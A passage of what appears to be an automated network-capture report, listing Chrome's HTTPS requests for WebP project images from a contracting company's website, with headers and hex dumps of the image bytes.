                                              Data Ascii: 5n&tpJU)R/b}h-lQ1]1f2X^S#Uf&HL}W<O]wB`n[S~W=7it`o]YW=}$r#71Ok7#_9-R<f ^0R*"d0s9ZzNC5]Q'L`YB-c}@g:`GtPpyhFi
                                              2024-09-27 06:20:17 UTC8000INData Raw: 59 43 bb 0a 01 ad f6 51 ec fb e8 93 87 25 54 1c 4a 31 b7 ab 88 15 9a 78 eb d0 81 fa 9a a5 0f cb 84 8c 14 30 7c 73 b9 3d cc c7 17 fe 0d bd 4b 7e 7e b9 a3 0e eb bf 1d 4e c6 5b 3b a2 2a ee f8 6c 4f 4c fa ff 26 57 1c 61 82 6b 25 d9 e7 b6 8b 8d dc 5f 96 db ba 18 b8 54 77 11 68 7b 0d 57 f9 01 59 e8 74 a8 3e b4 36 d7 c6 62 80 88 8e 72 23 64 f2 4d be d0 df 18 85 40 e2 5e 1d dd 6e 6f f9 a7 59 2d 7e 32 a2 c6 38 0b 2a 90 79 26 46 d0 c3 ea a7 5c a7 c0 6d be 3c e1 d7 bb 4e 8a ad af 87 18 99 78 6a 15 c6 65 bb 9e 55 05 25 9b 80 1a 0a 0e 2a 16 97 72 46 0d 7c d2 e2 0e 82 e7 f9 a7 f8 2e 74 d6 29 3a ff ee 21 02 6e f9 81 99 b0 f1 af 06 b8 6c 99 99 0c de a6 67 24 3c 79 33 d5 5c 12 b2 75 61 93 9b 86 24 5d 50 70 c6 c1 fc be b0 c0 df a1 9e 5b 9d 56 5e 62 af 11 ff ad e2 57 be 2f
                                              Data Ascii: YCQ%TJ1x0|s=K~~N[;*lOL&Wak%_Twh{WYt>6br#dM@^noY-~28*y&F\m<NxjeU%*rF|.t):!nlg$<y3\ua$]Pp[V^bW/
                                              2024-09-27 06:20:17 UTC8000INData Raw: 22 29 19 6d c8 59 4d 4e d4 d4 5e 8d 96 28 88 e0 a4 d7 a8 38 5a 3c 6c 2c ad 25 0f eb 1e b8 ae ba b2 52 8d 60 35 a5 8e 89 45 7e d9 df 07 66 46 7c b6 14 a6 31 4c 01 0b d1 e3 93 f2 e2 87 cf 4a 6c 7a a3 e5 9b b6 c9 11 26 9b 11 47 82 19 12 12 b5 90 10 42 87 64 c0 42 59 4f de df 99 5d 69 26 e1 36 f1 aa fd 99 e9 f4 56 f8 38 7c c4 fc b4 1d f7 31 c7 fd 45 61 bc 5d af a2 ec 3c db dc 29 ee 9c f2 31 b4 96 7a 9d ea 80 fe 7a d1 eb 31 aa 72 9f a3 47 c6 6b d2 fe ce 4f 33 dd cc c4 62 8c 69 51 40 08 e3 fe ec 07 7f 80 eb b5 ba da b7 47 90 d8 7a 4a b3 12 7c bc 89 e6 fe 95 6b 58 e7 40 ed e6 75 a1 fb 25 1e 93 73 0c 82 35 e4 27 a6 9c 68 35 fa 5e c7 46 d0 2b 74 7f 00 d4 b5 83 90 6f 76 68 83 f9 95 1c 38 63 54 be 94 6d 48 1d 96 d8 9a 3c f3 5d 95 29 d0 80 0c 49 06 db 23 cf cc 84 36
                                              Data Ascii: ")mYMN^(8Z<l,%R`5E~fF|1LJlz&GBdBYO]i&6V8|1Ea]<)1zz1rGkO3biQ@GzJ|kX@u%s5'h5^F+tovh8cTmH<])I#6
                                              2024-09-27 06:20:17 UTC8000INData Raw: 39 c8 4a 02 af 14 9b 0e 69 ba d8 b3 53 4e 23 50 79 8f ef 4a b0 e1 9e 4d 4c 18 d0 a0 c3 1d d2 94 13 03 09 3e 48 42 8a 01 59 18 f5 e4 b4 f4 57 95 d0 b5 1f aa 75 10 f1 0f c3 5c 30 93 be 90 81 c0 75 5a 6b c9 d6 3f 8c 72 97 f2 8c 5f 07 30 cd eb b5 50 26 d3 52 4f 52 68 35 b4 14 f7 05 e4 11 8f 85 f8 8f 37 4b 76 25 2f 88 75 9b 65 14 47 97 06 4b 97 5e 3d 9f 0a f9 0f 75 90 60 e0 64 39 26 00 b4 ca dd 60 32 f8 01 2b 73 7b fc 9b 1c 9b fb 69 36 96 ac 6a a5 7b b6 ca c2 e4 64 c6 4b 46 a7 fa 45 d7 5e 48 25 4d 09 42 e1 09 33 9d 3c ab 4a b5 f2 f3 77 d6 45 b8 5f 5b 5e be 16 6c 0f c3 87 78 7b 35 ca 45 43 a1 ee 66 cf ff 23 93 29 0d d1 98 04 ac 74 d2 41 16 50 a9 e1 cc df 2e 19 c6 d2 f5 ea fa 55 bc 58 9c 55 95 9d 9d fc b6 fc 6c 7d 84 ac 40 89 95 03 8a 0e 06 65 cb bd 42 1d e2 13
                                              Data Ascii: 9JiSN#PyJML>HBYWu\0uZk?r_0P&RORh57Kv%/ueGK^=u`d9&`2+s{i6j{dKFE^H%MB3<JwE_[^lx{5ECf#)tAP.UXUl}@eB
                                              2024-09-27 06:20:17 UTC8000INData Raw: 17 f8 70 41 bf ce 07 81 fb ce f0 6d b2 47 20 48 24 f4 9b 07 63 67 01 6e 2e b0 8c fc b5 dc 12 81 73 e8 7d 4f de 27 c5 a2 3b e9 d6 b8 9d d5 01 db cd 1b f7 b3 b9 59 42 bb 6d 51 17 0a 4e 50 4b 22 c8 4a 84 80 1e 49 61 eb b2 b2 c0 e5 b3 40 eb 4d 39 5e 8b e3 ea 4e b8 96 22 97 b9 9d b7 ad 93 8c fd 1e e3 88 3d 55 07 c4 7e b4 00 b6 b3 7e 06 bc 07 93 05 a5 c7 66 f8 3c 05 fb 98 5d 1c cb 92 ba 5e 7b 71 75 3e e6 c1 42 4f 0d fb 1e fc c5 cc 89 f1 03 c5 5e 10 d2 12 47 19 db 62 54 56 1e 56 64 7d c2 d6 0d 18 47 e0 88 4b 6e 21 66 64 09 b1 08 e4 a6 20 6e 64 01 02 0b ce d9 f7 20 32 80 22 a0 38 a2 a6 7b b2 37 14 10 67 83 6e 63 49 dc 62 f9 0f 7d ab 69 8d 38 68 48 1e e3 79 5f 40 32 c5 43 91 e1 f6 8f 15 e8 36 23 86 51 18 03 fa 17 1d 69 90 4a d3 7b 9d 44 ae 86 09 3c c4 29 c6 2b ea
                                              Data Ascii: pAmG H$cgn.s}O';YBmQNPK"JIa@M9^N"=U~~f<]^{qu>BO^GbTVVd}GKn!fd nd 2"8{7gncIb}i8hHy_@2C6#QiJ{D<)+
                                              2024-09-27 06:20:17 UTC8000INData Raw: 05 4c 83 9f c3 63 21 38 27 c7 6a 82 ed d8 8f 97 1b dc a7 98 ab 18 b3 96 03 f1 4b d3 91 bc a4 32 1b 4d 3e 5d a4 86 ec 56 06 20 5f d3 6b 7f a9 a8 21 cd 5c e4 26 e2 eb ec 09 70 ff 16 0b 83 37 76 5d 04 93 f5 66 b9 00 8a 89 f8 41 a0 1c 63 cc 3f 66 be 7f 15 ff 64 85 38 7a a3 80 a7 b4 e1 6e b6 95 54 79 cb c1 06 12 08 24 4e 46 dc 31 ed e6 68 e3 c3 1c 63 fe 3f 9b a0 9e 8f 40 f5 17 52 99 bc 2a a3 68 66 7e 0d f5 04 71 63 e9 32 a0 14 f8 0f 16 4c f6 a7 2d 8a 2a b1 81 02 9d 5c 91 ed d1 35 0f 7a bf 0b f5 f0 3f 3d 36 d0 22 76 4c a3 5a 2c 55 29 2c f9 88 be 9e 43 eb 85 21 74 e2 4f aa 8d 91 0f 84 f3 fe dc bb 4b ce d1 42 e1 34 68 e2 d5 18 df a5 54 cc 31 85 e3 c4 16 f5 2e 41 10 05 9b c9 1c b0 f0 7f ba c1 a0 c3 de 61 fd ea bb 8c 31 08 ba 2f 87 6f ba 50 53 0a a9 5b d8 a5 3a df
                                              Data Ascii: Lc!8'jK2M>]V _k!\&p7v]fAc?fd8znTy$NF1hc?@R*hf~qc2L-*\5z?=6"vLZ,U),C!tOKB4hT1.Aa1/oPS[:
                                              2024-09-27 06:20:17 UTC155INData Raw: 3a e1 54 17 df 57 b6 f9 20 1e fb e0 33 fd c1 c4 1e 04 97 03 9d 2c 7e 8e f1 b8 ca 58 fb f3 53 2e 74 66 bd c5 a1 90 09 17 51 8e f2 2b d5 1f 82 b9 94 49 f1 07 e0 22 da 08 c4 07 0a 3e ea 34 04 57 25 84 12 00 00 50 53 41 49 4e 00 00 00 38 42 49 4d 03 ed 00 00 00 00 00 10 00 48 00 00 00 01 00 02 00 48 00 00 00 01 00 02 38 42 49 4d 04 28 00 00 00 00 00 0c 00 00 00 02 3f f0 00 00 00 00 00 00 38 42 49 4d 04 43 00 00 00 00 00 0e 50 62 65 57 01 10 00 06 00 2a 00 00 00 00
                                              Data Ascii: :TW 3,~XS.tfQ+I">4W%PSAIN8BIMHH8BIM(?8BIMCPbeW*


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              95192.168.2.465439173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:20:17 UTC724OUTGET /uploads/projects/21/ccbc0b3107341d28610c4ec42a1c8641.webp HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                              Sec-Fetch-Site: same-origin
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: image
                                              Referer: https://www.citydiamondcontracting.com/projects
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:20:17 UTC261INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:20:17 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Tue, 10 Jan 2023 11:45:17 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 47858
                                              Connection: close
                                              Content-Type: image/webp
                                              2024-09-27 06:20:17 UTC7931INData Raw: 52 49 46 46 ea ba 00 00 57 45 42 50 56 50 38 58 0a 00 00 00 00 00 00 00 ce 04 00 a2 03 00 56 50 38 20 76 ba 00 00 d0 f0 04 9d 01 2a cf 04 a3 03 3e e9 68 ae 54 29 25 38 3d a3 11 0b 2b b0 1d 09 67 6e 73 87 b7 31 ed 34 fc bc 3f 2f fd dd 5e 1b f7 d7 81 ae 78 3e 44 bd cc ff f8 df 1a e4 6c cc bb 57 f3 3c 5a fb 3b b3 7f f0 bf f2 bd 83 7c bd 33 9b 72 74 c9 38 8f 56 e4 7f fc 0f 77 fd 85 b9 27 ec 4f f6 ff 6f d9 0b 43 df 2d d3 3f ee bb de 7f f6 f3 ff d2 5f c9 4f 44 26 ec df ae bf f2 3e 9c cf 4d bc 22 ef fd 5d f1 7f d1 fd c1 ef 89 fa 1f f9 ff da 7b 98 63 7f eb fb bb ff 1e ce e7 fc 7e 2c fe eb fc e7 a1 07 ed 1e 3f 92 5c e6 d5 06 fe a1 e5 8b 42 bf b9 5a 61 fc 3f 44 af fe 1e 93 7f 61 ff c8 40 89 07 82 62 30 42 81 6b 81 d6 2d 94 d5 e5 2b 26 4c 0b 89 94 ad a4 14 4b d2 85
                                              Data Ascii: RIFFWEBPVP8XVP8 v*>hT)%8=+gns14?/^x>DlW<Z;|3rt8Vw'OoC-?_OD&>M"]{c~,?\BZa?Da@b0Bk-+&LK
                                              2024-09-27 06:20:17 UTC8000INData Raw: 19 fc bb e7 40 e9 cb ec 44 2f fa b8 39 21 aa df 1f d0 a5 f9 58 6d f5 a8 2c 58 e3 56 a4 a9 b3 0a 40 5b af fb c1 28 5d 5c 4d 6f d0 4a 49 12 7e 42 53 db 19 0b d7 dc b8 c7 50 b6 d1 94 74 46 03 38 18 d8 12 a3 16 83 a7 23 55 ea 92 83 8c 7d 0f 97 06 b5 e2 51 6b b8 02 f7 42 bc 51 0f 3f df f6 fd 05 47 39 ae d3 66 36 a8 80 8f de 05 66 1e 5c e5 91 fb a0 ce 48 36 c1 ac 36 1b ad 7a ce 54 7c bc 05 f8 14 2a f9 f6 3d a0 5d ee 75 d1 4e 5c a7 e0 f7 07 8f 12 8f 82 31 4f 8c c6 10 13 a9 f2 c0 35 b6 7c 75 14 4b 20 2b db ae 10 fa 9f 04 49 e9 e3 2c 47 17 7f 1c 09 13 f9 14 53 a8 32 20 7d 61 86 78 e6 0d 01 2b 0d 91 9c d7 74 c3 a7 da 29 a1 3e 31 51 8e ed e8 1b c9 5a b3 ef 44 0d 27 9c 96 a1 20 4a cc 59 a0 e7 10 8a 09 19 f0 1a 46 36 02 06 aa e4 1c 35 89 67 7a 05 e3 d7 55 95 4c a3 e0
                                              Data Ascii: @D/9!Xm,XV@[(]\MoJI~BSPtF8#U}QkBQ?G9f6f\H66zT|*=]uN\1O5|uK +I,GS2 }ax+t)>1QZD' JYF65gzUL
                                              2024-09-27 06:20:17 UTC8000INData Raw: ee 81 42 61 85 92 31 f5 6d c5 02 ad 1e 7c cc 69 d0 eb 03 d8 14 92 ff fe d2 4f 22 5c 39 ba 15 7c f0 fd bf 74 a5 99 96 31 19 1d f8 80 ed b7 ed 35 b6 4f b5 36 5c f4 9b ce 6a ad be e8 81 be 55 f2 b6 e5 d7 90 1b 79 0b d6 fe fb 76 20 36 eb da 9f d9 46 2b d9 42 fd 89 a4 af 9d 81 6c 47 90 69 6b 60 f8 00 d5 f0 43 52 49 f7 cb 7a b8 b1 8c 23 5b a1 f3 2c 0a 52 da 2e 36 64 a4 64 fe c9 82 2e 6d 9d 56 69 d4 ef 31 2f b4 fd d4 cd 2f 79 ee b9 3c 9b be cc 6d 09 40 8a e6 8a db 76 1d cb 35 5a 66 b7 50 ba c1 44 5b 5e ef e7 89 8e 57 a4 de 98 01 ae cd d4 72 c9 60 43 44 fc b0 5f 8a ff a4 00 f1 49 6a 12 dd a0 e1 45 ba e3 68 91 15 f6 13 4a c4 6a f9 2b e7 60 64 d2 60 c5 c1 1c a6 56 b2 71 2c 29 1a 9d 0f 5e 8f ce b5 03 01 83 7f 2d da ad d4 f5 38 91 03 e2 d9 27 63 ee 1f ca a6 74 d3 74
                                              Data Ascii: Ba1m|iO"\9|t15O6\jUyv 6F+BlGik`CRIz#[,R.6dd.mVi1//y<m@v5ZfPD[^Wr`CD_IjEhJj+`d`Vq,)^-8'ctt
                                              2024-09-27 06:20:17 UTC8000INData Raw: c8 f3 93 f8 74 6e 0d a2 7c d4 83 50 73 38 d9 b6 8b d6 32 db 0f d0 82 4b 32 ef ae b2 cf 9d 8a 52 db f4 47 b5 79 34 59 01 72 02 b8 69 bd e9 48 23 5b f3 40 2d 8e 5c a2 89 93 9d 7c 95 ae 07 a8 c4 e8 5b 52 b7 96 15 f9 55 7c f9 84 e1 29 0b 8b 7f 37 14 ab 44 3f 34 8d 1d 83 6a 18 c8 8a db 9b 55 bd 1f 60 3f 9a 57 64 85 49 36 32 f0 82 42 f0 4a 76 26 1d 0f 5f 2d 78 42 6d 5f c7 aa f3 c5 0e 7e 78 d2 06 ae df 1d 3d 57 34 d4 1e 65 0e 16 ef 4c c7 da 6d 6d 8d 7c c0 60 3a 71 99 93 7f 9e 33 7b 1d 00 2b 59 27 5d 41 e9 13 dc 1c fb 4c 3f 57 ee 0c af 6b 9b 8a ba 28 46 e2 e9 63 47 4b 45 bc 2e d8 8c 4d 6c 8b 02 d4 ea 0a 04 5c a5 e8 05 8b 4e c8 31 87 d5 21 8b 93 bd e2 86 a4 10 bf 2d 42 6f 75 b6 97 a8 37 05 bc 60 42 5c b6 69 b5 4f 8e 8e 45 4a 3f 30 fa 11 bf 54 8d 51 ce 24 4e bd 2d
                                              Data Ascii: tn|Ps82K2RGy4YriH#[@-\|[RU|)7D?4jU`?WdI62BJv&_-xBm_~x=W4eLmm|`:q3{+Y']AL?Wk(FcGKE.Ml\N1!-Bou7`B\iOEJ?0TQ$N-
                                              2024-09-27 06:20:17 UTC8000INData Raw: 1b 4b bd 76 4c 65 22 51 e5 2e fe 9d d0 8d 47 05 06 78 55 f3 78 dd e6 7d 70 2e e0 b4 07 59 9b af 7f 19 3a 19 95 c5 21 c9 6b 94 04 fa 83 5a e5 b5 d9 1e 75 e3 ec 20 fe 8e 33 7c b1 d8 98 1f 81 39 09 50 a5 e4 b1 90 80 2f c6 7b 04 4c 53 65 71 fc 12 9b dd 46 9f d0 b3 ea 62 1d 98 20 dc 9f 82 fd 52 9b 6c e0 e7 1a 33 66 dd 88 a3 ce d8 50 34 76 7a db 72 09 1b 5e 74 ca 2d f8 f4 12 49 dc ba ed 99 45 fa 0d e0 de 01 2c c6 56 5c 77 ce 45 48 a2 97 18 22 1a 86 f6 e0 9a 60 e4 d3 d1 55 dd 9e df 07 09 88 db f3 01 1b 26 89 b0 4f 00 09 3c f1 27 f9 fd bc e8 37 48 ec bd d9 c8 30 d2 f9 f5 3e e4 42 54 16 78 71 33 d3 17 b5 90 5f 9d 64 e6 0b b2 42 12 8e 42 51 f4 f6 c4 6e 76 4d 92 c6 2a 9e de 5b b8 4d 75 69 57 ab 30 6d 1a b8 be 26 f9 d0 76 0d 80 d6 a4 85 2e 73 d3 b5 1c 75 84 ec 84 cb
                                              Data Ascii: KvLe"Q.GxUx}p.Y:!kZu 3|9P/{LSeqFb Rl3fP4vzr^t-IE,V\wEH"`U&O<'7H0>BTxq3_dBBQnvM*[MuiW0m&v.su
                                              2024-09-27 06:20:17 UTC7927INData Raw: 08 cd 3c fc 78 e7 e2 8e 23 91 fd 82 08 79 c5 44 44 9f 30 4c fd e3 56 f0 42 a4 ea 3c 06 27 58 16 e6 f6 4b 8c 2e da 6d f9 bf c1 2b a1 37 59 93 f7 22 60 c9 54 d4 7c c9 24 09 42 da 55 33 8e 0a fc fc c2 30 8f 50 4a 54 e9 21 38 83 b4 57 b7 f8 5c 59 85 1a 41 a1 53 37 08 a3 2f 50 af b3 bb 89 2d c7 0a c6 9b 71 16 5c 6a e8 47 a6 93 23 c7 09 ab 43 2d 69 21 19 b0 1e f2 96 5d 1e c6 03 7e e9 9b 06 5a 6a cf 03 56 30 33 8c 9a 00 75 66 be c4 f9 4b 8d 4c 97 b0 47 a5 bc e0 80 7c ef d3 fa 44 14 ca bc 54 30 88 2f c4 a8 97 88 f6 68 f7 4b dc a3 82 1d 3b 6b b5 4c c2 9f 98 70 4c 52 c1 bb 8c 14 ae a5 3f bb 42 9b 8b ee 3c ab cc d0 69 1a 50 8f 44 c8 02 df 44 ba dd f0 d2 a0 7f 74 59 7a 2a 94 8d 24 df 1e 72 87 f0 51 21 11 f8 27 d2 48 e6 a6 8b 8e 7a a7 7a 5f b9 05 a2 3e bb 4f 18 f3 4a
                                              Data Ascii: <x#yDD0LVB<'XK.m+7Y"`T|$BU30PJT!8W\YAS7/P-q\jG#C-i!]~ZjV03ufKLG|DT0/hK;kLpLR?B<iPDDtYz*$rQ!'Hzz_>OJ


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              96192.168.2.465430173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:20:17 UTC465OUTGET /uploads/projects/22/99d0794491cfd3b80cd8a673e31ef7e3.webp HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: */*
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:20:17 UTC261INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:20:17 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Wed, 11 Jan 2023 14:33:36 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 63024
                                              Connection: close
                                              Content-Type: image/webp
                                              2024-09-27 06:20:17 UTC7931INData Raw: 52 49 46 46 28 f6 00 00 57 45 42 50 56 50 38 58 0a 00 00 00 00 00 00 00 ce 04 00 a2 03 00 56 50 38 20 b4 f5 00 00 50 41 05 9d 01 2a cf 04 a3 03 3e e9 6c af 51 29 2b 3f ae a6 b1 ab 7b f0 1d 09 48 38 01 78 cd af d9 e5 d3 e8 1d 52 b8 a1 ff 8f cc fc ef fd 1a bc 2b 9f 17 92 d7 9e ab a3 8d 67 d9 af fe e3 ce 9a e5 a9 6d f3 f2 17 f3 46 f5 6b e3 2b fb cf 4d 39 9f 1c 0f f0 ed 49 94 fe 9d ed 2f aa 9f 2d fa 79 1b 8c 6e 3a bf 36 ff 71 ef b7 ff 7b d7 e7 f9 0f f8 fe b7 fe 91 ff f6 fb 15 fe bd e9 13 cd 9b ce 7f a6 7b d7 53 fa 07 4d ff ae 57 f8 fc 92 df a2 fe e9 fa 64 fa 17 cd d7 95 3f 9a fd ff cb 43 03 ff 13 f3 21 ed 0f 66 ef ee fc 3d fd df f8 cf 41 af dc 3c b7 7f 2b b8 ef 58 ff 9f e8 23 ee 17 e0 bc cd 3f 63 cf 4f e9 7f d7 7b 03 ff 79 f4 27 c8 77 eb 7e 87 de 93 3e 20 be
                                              Data Ascii: RIFF(WEBPVP8XVP8 PA*>lQ)+?{H8xR+gmFk+M9I/-yn:6q{{SMWd?C!f=A<+X#?cO{y'w~>
                                              2024-09-27 06:20:17 UTC8000INData Raw: e6 a0 2c ae c9 c6 b1 e6 e0 67 b3 80 c3 3b c7 1d e9 90 30 83 f5 2f ab 2c 17 f0 4a 54 a9 a4 00 c5 c7 ec 18 65 19 f7 5f 18 8e 05 a7 4b bf 29 5e ed 46 b7 79 b3 4e 4d b0 be 0f 9d 25 7d 2c 7f 47 33 be 41 7b 03 a4 45 72 3c ef 5c 77 6b df 39 15 1f b0 2b be a3 d5 9c ec e0 ea 9f da b8 ff 1e fd cd 09 cc ec 7b a8 fb 0b e5 0e dc 58 52 6f eb c0 b0 97 22 85 5f 02 49 2b ed ad 4f e3 57 01 ba 4a 88 dd b8 8b 44 2c 3a 70 4b ce 69 94 a6 3d b7 ce 8f df 90 63 2a 19 7a b7 2c ca b4 a8 10 22 5f ba 71 fb ea d1 45 e7 c4 00 33 6b db 4c f2 32 c5 26 9a f3 fa cf ed da 32 2d ab 14 25 99 7c 0c f7 62 5b 4a 82 7e 91 40 79 8b 37 f4 2b f1 a3 13 f7 c6 29 35 1a 2b fe 2c 8e af b2 c0 51 e4 a7 f4 10 5d 7e 70 25 b4 3e 4a 1b 7b 2f 31 37 6e 33 4a 0d c2 71 7c 63 2c a7 fc b5 ee 1a e6 37 b3 a4 fe 94 b2
                                              Data Ascii: ,g;0/,JTe_K)^FyNM%},G3A{Er<\wk9+{XRo"_I+OWJD,:pKi=c*z,"_qE3kL2&2-%|b[J~@y7+)5+,Q]~p%>J{/17n3Jq|c,7
                                              2024-09-27 06:20:17 UTC8000INData Raw: 09 bf 69 00 b0 22 6e 17 46 77 16 36 1f 28 b8 ca c6 84 60 60 b0 0b f5 9c 64 0a e1 20 82 82 f1 3e d3 05 0b 48 6b d4 bb 80 3f 0f 4c ba 3d 6b e7 0d 12 7d 88 d1 48 bb fd 61 2b bf 6a 8a f1 a9 57 02 b6 ed 93 76 3c 57 70 f2 d7 3d 8b 78 d2 98 64 46 0f ba f2 97 bc 27 e2 83 34 c8 c5 e6 79 22 ad be 21 3d 93 b6 33 26 82 e2 8c cd 6e 2a f3 47 47 e4 46 d6 ac d1 55 5e 4b c2 a3 c8 78 5a 78 2b be d9 86 69 45 3e d0 1f 9b b9 dd 33 d0 7c b5 38 d8 8e cb fa be f3 85 3a 03 0f 22 49 04 8f 00 28 99 bc 8f 5f 8d 4d 07 f3 a9 42 68 19 8b 91 a5 17 f8 15 13 25 e2 f0 4c 05 7f 25 12 9d 1c 26 f1 68 4b d6 bd a5 7f aa dd a8 99 97 3c df d0 91 07 fb c0 38 cc 98 dc 9d be ed 57 c7 f0 98 fa f1 dc dd 2d 0a 90 3c d0 15 e3 49 48 6a 3a 0b 33 cc 36 05 63 e1 07 71 95 2f 06 10 31 90 9e 2e e5 bc cc af bf
                                              Data Ascii: i"nFw6(``d >Hk?L=k}Ha+jWv<Wp=xdF'4y"!=3&n*GGFU^KxZx+iE>3|8:"I(_MBh%L%&hK<8W-<IHj:36cq/1.
                                              2024-09-27 06:20:17 UTC8000INData Raw: c4 b5 4e 25 e3 85 08 43 25 d4 da a9 91 a9 61 1a 45 8c a4 a1 ec 08 9d 6e ac b9 14 c6 04 08 01 e8 58 99 6e a4 e3 ef 0b 82 8c b1 3b 12 78 db 0a 0b 53 da cf 8a f8 32 eb 49 7a 0b 4c fa cf ac 11 65 0d 14 ca 4f 9d ed ca 3b 00 84 22 2f 1d 54 dd d6 9f 6d 9e b1 b5 19 f2 33 6e 96 66 18 73 23 d8 bd c5 15 42 2c df 10 38 15 57 77 76 55 78 aa ed 31 40 f4 e9 81 31 af 9b 06 4f d7 39 78 13 0b 3c aa a6 8d 95 7c ad b1 8c 1d a9 7c d8 6c b4 b7 e0 47 6a 92 8e 8c d5 a1 a4 af c0 05 3f e1 29 71 59 73 93 f0 ad 7e ec e5 2c 94 67 a2 40 54 75 02 0a 59 80 2f 92 3b 2f 9b 75 80 49 de 4c 09 6b a1 64 27 bc 5a 9c 24 72 70 f4 99 4f 04 70 0a a9 d2 2c b4 c7 d6 34 da 34 6d 55 81 eb c6 b3 28 b6 04 a8 d3 3b d6 3c 34 c0 ab 43 aa 45 2b a4 37 4f fc 7f cf f9 45 e8 c8 ee 11 8a 69 6c 5e 74 84 b2 df df
                                              Data Ascii: N%C%aEnXn;xS2IzLeO;"/Tm3nfs#B,8WwvUx1@1O9x<||lGj?)qYs~,g@TuY/;/uILkd'Z$rpOp,44mU(;<4CE+7OEil^t
                                              2024-09-27 06:20:17 UTC8000INData Raw: 18 70 34 df 97 a2 f1 4e 6b 72 f9 e3 85 53 3c 5b 0f 09 95 c8 ac da 4b 52 29 a1 62 a3 6f 97 54 22 d8 b2 f9 4e b5 a1 be a9 2b ea 69 53 6d 63 52 c2 7c a8 4c 61 45 3b 6e 1d b7 1f f7 43 0d 29 ea f0 6d 7c dd ae 90 82 b1 be 99 f9 5d db ae 70 3b b6 01 3a ea f0 26 51 e0 a0 bd 53 48 fd 65 6a 0f 41 c1 3c 70 43 4e e7 59 ea ea d7 a5 6b ff 9b 55 31 7c 2f 03 c1 45 80 bf 91 35 51 f2 ef 05 e7 f7 cb 34 0f 8a a7 82 92 c5 76 38 3d 9b 1d d3 3f 52 17 2c 5b e1 b8 03 df c0 dc a5 22 2e dd 55 70 e5 fb df 08 c7 3a 1d 58 b1 74 b5 a6 7e e6 2d b6 4e 47 42 f4 c0 66 08 8c f4 03 5f b3 47 a0 36 9b 71 b3 2e fd 58 70 a9 45 4b 83 77 41 1a ad cf e9 5e d4 71 c9 84 d0 ff f5 43 30 c5 35 40 95 da 33 5b 5b fe ba 9e 7d 36 bf d3 45 54 db 42 74 d9 60 da e1 03 8b 52 1c 04 e2 4d 73 a2 9d 48 8b 26 f2 88
                                              Data Ascii: p4NkrS<[KR)boT"N+iSmcR|LaE;nC)m|]p;:&QSHejA<pCNYkU1|/E5Q4v8=?R,[".Up:Xt~-NGBf_G6q.XpEKwA^qC05@3[[}6ETBt`RMsH&
                                              2024-09-27 06:20:17 UTC8000INData Raw: 8e be 8b 44 bd 45 00 8b b5 dd 62 75 e6 9f aa 1f 68 3a ad 3c e7 74 da 54 e1 1f 63 d7 6c b4 d9 9f 2e 71 f4 2f 7c 28 a1 ec ab 45 43 43 f1 bb 59 08 47 47 7c a0 5e 1a 4a af 3a bc a5 1e 63 64 82 27 9a 04 b3 a3 81 f0 7f 5f 0b 49 85 a2 cc 51 dd b6 84 01 eb 7f 79 fc b7 64 63 e8 65 5f 67 51 d4 8b c6 f7 ba b0 03 60 63 80 9b 17 02 98 9e 48 6b c9 bb 15 70 da a3 de 5c 6d ec d5 cf db 6c 28 6b ac 0d 67 13 16 41 d7 82 34 51 da 91 20 55 a3 a7 0d 7e c9 46 9d 63 22 e9 1f 26 1c 7e 57 3c f3 4d 2a d3 9e 33 bf d7 21 51 a1 7c ae 10 2a 96 c6 89 3e b2 e2 46 dd 3d e2 5f 72 73 ef 0f 61 09 10 b3 97 ca a2 6f 3f 7f 10 f7 c2 ef f1 0b c7 94 99 3a dd 7b 39 ec 61 20 48 b9 f3 f9 cb 09 aa 55 37 eb 2b 57 42 a6 57 24 1a 02 bd 18 9c 65 b5 b4 43 f3 16 47 2e de 13 34 26 93 e3 26 53 6c c0 4a 18 3c
                                              Data Ascii: DEbuh:<tTcl.q/|(ECCYGG|^J:cd'_IQydce_gQ`cHkp\ml(kgA4Q U~Fc"&~W<M*3!Q|*>F=_rsao?:{9a HU7+WBW$eCG.4&&SlJ<
